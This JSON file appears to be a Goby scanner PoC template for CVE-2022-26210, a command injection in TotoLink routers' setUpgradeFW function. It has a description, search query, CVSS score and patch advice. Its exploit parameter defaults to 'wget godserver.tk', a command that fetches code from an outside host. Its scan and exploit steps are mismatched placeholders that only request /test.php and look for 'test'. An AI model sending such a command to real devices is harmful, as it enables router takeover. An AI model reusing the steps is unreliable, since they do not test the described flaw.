Goby/json/TotoLink-FileName-RCE(CVE-2022-26210).json

{
  "Name": "TotoLink FileName RCE(CVE-2022-26210)",
  "Description": "<p>TotoLink A800R, A810R, A830R, A950RG, A3000RU and A3100R and other routers are all products of TotoLink Company in Taiwan, China.<br></p><p>The FileName parameter of various TotoLink routers contains a command injection vulnerability in the function setUpgradeFW. This vulnerability allows an attacker to execute arbitrary commands with a crafted request.<br></p>",
  "Product": "TotoLink",
  "Homepage": "https://www.totolink.net/",
  "DisclosureDate": "2022-04-02",
  "Author": "abszse",
  "FofaQuery": "body=\"cstecgi.cgi\"",
  "GobyQuery": "body=\"cstecgi.cgi\"",
  "Level": "3",
  "Impact": "<p>The FileName parameter of various TotoLink routers contains a command injection vulnerability in the function setUpgradeFW. This vulnerability allows an attacker to execute arbitrary commands with a crafted request.<br></p>",
  "Recommendation": "<p>At present, the manufacturer has released an upgrade patch to fix the vulnerability. For details, please pay attention to the manufacturer's homepage: <a href=\"https://www.totolink.net/\">https://www.totolink.net/</a><br></p>",
  "References": [
    "https://www.fortinet.com/blog/threat-research/totolink-vulnerabilities-beastmode-mirai-campaign"
  ],
  "Is0day": false,
  "HasExp": true,
  "ExpParams": [
    {
      "name": "cmd",
      "type": "input",
      "value": "wget godserver.tk",
      "show": ""
    }
  ],
  "ExpTips": {
    "Type": "",
    "Content": ""
  },
  "ScanSteps": [
    "AND",
    {
      "Request": {
        "method": "GET",
        "uri": "/test.php",
        "follow_redirect": true,
        "header": {},
        "data_type": "text",
        "data": ""
      },
      "ResponseTest": {
        "type": "group",
        "operation": "AND",
        "checks": [
          {
            "type": "item",
            "variable": "$code",
            "operation": "==",
            "value": "200",
            "bz": ""
          },
          {
            "type": "item",
            "variable": "$body",
            "operation": "contains",
            "value": "test",
            "bz": ""
          }
        ]
      },
      "SetVariable": []
    }
  ],
  "ExploitSteps": [
    "AND",
    {
      "Request": {
        "method": "GET",
        "uri": "/test.php",
        "follow_redirect": true,
        "header": {},
        "data_type": "text",
        "data": ""
      },
      "ResponseTest": {
        "type": "group",
        "operation": "AND",
        "checks": [
          {
            "type": "item",
            "variable": "$code",
            "operation": "==",
            "value": "200",
            "bz": ""
          },
          {
            "type": "item",
            "variable": "$body",
            "operation": "contains",
            "value": "test",
            "bz": ""
          }
        ]
      },
      "SetVariable": []
    }
  ],
  "Tags": [
    "Command Execution"
  ],
  "VulType": [
    "Command Execution"
  ],
  "CVEIDs": [
    "CVE-2022-26210"
  ],
  "CNNVD": [
    "CNNVD-202203-1482"
  ],
  "CNVD": [
    ""
  ],
  "CVSSScore": "9.8",
  "Translation": {
    "CN": {
      "Name": "TotoLink 多款无线路由器 FileName 命令执行漏洞 (CVE-2022-26210)",
      "Product": "TotoLink多款路由器",
      "Description": "<p>TotoLink A800R、A810R、A830R、A950RG、A3000RU 和 A3100R等多款路由器是都是中国台湾吉翁电子（TotoLink）公司的产品。<br></p><p>TotoLink 多款路由器FileName 参数在函数 setUpgradeFW 中包含命令注入漏洞。此漏洞允许攻击者通过精心制作的请求执行任意命令。<br></p>",
      "Recommendation": "<p>目前厂商已发布升级补丁以修复漏洞，详情请关注厂商主页：<a href=\"https://www.totolink.net/\">https://www.totolink.net/</a><br></p>",
      "Impact": "<p>TotoLink 多款路由器FileName 参数在函数 setUpgradeFW 中包含命令注入漏洞。此漏洞允许攻击者通过精心制作的请求执行任意命令。<br></p>",
      "VulType": [
        "命令执⾏"
      ],
      "Tags": [
        "命令执⾏"
      ]
    },
    "EN": {
      "Name": "TotoLink FileName RCE(CVE-2022-26210)",
      "Product": "TotoLink",
      "Description": "<p>TotoLink A800R, A810R, A830R, A950RG, A3000RU and A3100R and other routers are all products of TotoLink Company in Taiwan, China.<br></p><p>The FileName parameter of various TotoLink routers contains a command injection vulnerability in the function setUpgradeFW. This vulnerability allows an attacker to execute arbitrary commands with a crafted request.<br></p>",
      "Recommendation": "<p>At present, the manufacturer has released an upgrade patch to fix the vulnerability. For details, please pay attention to the manufacturer's homepage: <a href=\"https://www.totolink.net/\">https://www.totolink.net/</a><br></p>",
      "Impact": "<p>The FileName parameter of various TotoLink routers contains a command injection vulnerability in the function setUpgradeFW. This vulnerability allows an attacker to execute arbitrary commands with a crafted request.<br></p>",
      "VulType": [
        "Command Execution"
      ],
      "Tags": [
        "Command Execution"
      ]
    }
  },
  "AttackSurfaces": {
    "Application": null,
    "Support": null,
    "Service": null,
    "System": null,
    "Hardware": null
  }
}